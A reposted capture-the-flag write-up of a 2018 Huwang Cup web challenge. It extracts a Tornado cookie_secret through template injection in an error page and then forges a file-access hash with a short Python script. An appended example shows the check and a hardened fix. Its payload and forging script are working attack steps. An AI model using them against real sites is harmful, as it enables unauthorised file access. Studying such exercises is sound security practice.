Reposted from https://blog.csdn.net/weixin_40871137/article/details/94998636
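This challenge is a reproduction of an original challenge from the 2018 Huwang Cup (护网杯).
Once inside, the page lists three txt files. Open each one and look at it. Their contents are as follows: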
/flag.txt
flag in /fllllllllllllag
/welcome.txt
render
/hints.txt
md5(cookie_secret+md5(filename))
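Look at the URL: web9.buuoj.cn/file?filename=/flag.txt&filehash=245a5ccf5543f16709d8c22851af5454
Try changing filename to /fllllllllllllag; this leads to an error page. The URL there is interesting too: buuoj.cn/error?msg=Error
Try changing the value of msg to 123: it is echoed to the page successfully. Combine that with the hint render (an expert's write-up hints at template injection) and use msg={{handler.settings}}
Now we have the cookie_secret, and with the earlier hint from hints.txt we can compute the filehash value. The script is as follows: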
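import hashlib

def md5value(s):
    # Return the hex MD5 digest of a bytes value
    md5 = hashlib.md5()
    md5.update(s)
    return md5.hexdigest()

def jiami():
    filename = '/fllllllllllllag'
    # cookie_secret taken from the {{handler.settings}} output
    cookie_s = "M)Z.>}{O]lYIp(oW7$dc132uDaK<C%wqj@PA![VtR#geh9UHsbnL_+mT5N~J84*r"
    # Inner hash: md5(filename)
    print(md5value(filename.encode('utf-8')))
    x = md5value(filename.encode('utf-8'))
    # filehash = md5(cookie_secret + md5(filename))
    y = cookie_s + x
    print(md5value(y.encode('utf-8')))

jiami()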
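
The server-side check that the filehash parameter implies, written out as an added example (not code from the original write-up or from the challenge): it shows why a swapped filename fails, why the check stops protecting anything once cookie_secret is readable, and a hardened variant. The function names, the allow-list and the HMAC-SHA256 variant are assumptions, and the secret is a constructed value.

```python
import hashlib
import hmac

def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()

def filehash(cookie_secret: str, filename: str) -> str:
    """Formula from hints.txt: md5(cookie_secret + md5(filename))."""
    inner = md5_hex(filename.encode("utf-8"))
    return md5_hex((cookie_secret + inner).encode("utf-8"))

def check_request(cookie_secret: str, filename: str, supplied: str) -> bool:
    """Assumed check behind /file?filename=...&filehash=... (constant-time compare)."""
    expected = filehash(cookie_secret, filename)
    return hmac.compare_digest(expected.encode(), supplied.encode())

# Hardened variant (assumption): only files the app means to serve, keyed with HMAC-SHA256.
ALLOWED = {"/flag.txt", "/welcome.txt", "/hints.txt"}

def sign_hardened(key: bytes, filename: str) -> str:
    return hmac.new(key, filename.encode("utf-8"), hashlib.sha256).hexdigest()

def check_request_hardened(key: bytes, filename: str, supplied: str) -> bool:
    if filename not in ALLOWED:  # the path is rejected before any hash is computed
        return False
    return hmac.compare_digest(sign_hardened(key, filename).encode(), supplied.encode())

def demo() -> dict:
    secret = "constructed-secret-not-from-the-page"  # constructed sample value
    key = secret.encode("utf-8")
    link_hash = filehash(secret, "/flag.txt")  # what the index page would link to
    target = "/fllllllllllllag"
    return {
        # the link as issued by the site validates
        "original_link": check_request(secret, "/flag.txt", link_hash),
        # filename changed, old filehash kept: rejected (the error page in the write-up)
        "filename_swapped": check_request(secret, target, link_hash),
        # anyone who can read the secret can produce a valid hash for any path
        "resigned_with_known_secret": check_request(secret, target, filehash(secret, target)),
        # the allow-list still refuses the path even when the key is known
        "hardened_unlisted_path": check_request_hardened(key, target, sign_hardened(key, target)),
        "hardened_listed_path": check_request_hardened(key, "/hints.txt", sign_hardened(key, "/hints.txt")),
    }

if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The allow-list limits the impact of a leaked key; the leak itself is closed by passing msg to the template as a variable rather than rendering it as template source.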